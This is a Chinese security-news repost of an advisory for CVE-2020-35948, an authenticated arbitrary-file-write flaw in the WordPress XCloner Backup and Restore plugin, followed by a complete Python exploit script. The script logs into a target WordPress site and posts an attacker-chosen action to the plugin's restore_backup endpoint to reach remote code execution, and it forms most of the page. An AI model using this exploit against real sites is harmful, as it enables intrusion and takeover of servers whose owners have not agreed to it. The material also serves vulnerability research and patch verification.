华域联盟 漏洞资讯 WordPress XCloner Backup and Restore plugin 安全漏洞

WordPress XCloner Backup and Restore plugin 安全漏洞

作者: sterben 发布: 2021年11月26日 64阅读 0评论

WordPress XCloner Backup and Restore plugin 安全漏洞

漏洞ID 2305146 漏洞类型 其他
发布时间 2021-07-02 更新时间 2021-07-02
CVE编号 CVE-2020-35948 CNNVD-ID CNNVD-202012-1890
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2021070010


http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1890

|漏洞详情
WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 XCloner Backup and Restore plugin before 4.2.13 for WordPress 存在安全漏洞,该漏洞允许经过身份验证的攻击者能够修改任意文件,包括PHP文件。攻击者可利用该漏洞实现远程代码执行。
|漏洞EXP 
# Exploit Title: WordPress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md

'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, 
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, 
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
'''


'''
Banner:
'''
banner = """


  #####  #     # #######        #####    ###    #####    ###          #####  #######  #####  #        #####  
 #     # #     # #             #     #  #   #  #     #  #   #        #     # #       #     # #    #  #     # 
 #       #     # #                   # #     #       # #     #             # #       #     # #    #  #     # 
 #       #     # #####   #####  #####  #     #  #####  #     # #####  #####  ######   ###### #    #   #####  
 #        #   #  #             #       #     # #       #     #             #       #       # ####### #     # 
 #     #   # #   #             #        #   #  #        #   #        #     # #     # #     #      #  #     # 
  #####     #    #######       #######   ###   #######   ###          #####   #####   #####       #   #####  
                                                                                                             
                                                                                                             
                                                                
                                                                by @Hacker5preme
"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
ajax_cmd = input('[*] Ajax Command to execute: ')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log':  username, 
    'pwd': password, 
    'wp-submit': 'Log In', 
    'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header= auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()


'''
Exploit:
'''
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"

header = {
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
    "Connection": "close"
}

# Body:
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)

exploit = session.post(url_exploit, headers=header, data=body)
print('')
print(exploit.text)
print('')

|参考资料

来源:MISC

链接:https://www.wordfence.com/blog/2020/09/critical-vulnerabilities-patched-in-xcloner-backup-and-restore-plugin/

来源:MISC

链接:https://wpscan.com/vulnerability/10412

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2020-35948

本文由 华域联盟 原创撰写:华域联盟 » WordPress XCloner Backup and Restore plugin 安全漏洞

转载请保留出处和原文链接:https://www.cnhackhy.com/97301.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。
5
标签:

作者: sterben

相关推荐

发表回复

联系我们

联系我们

2551209778

在线咨询: QQ交谈

邮箱: [email protected]

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部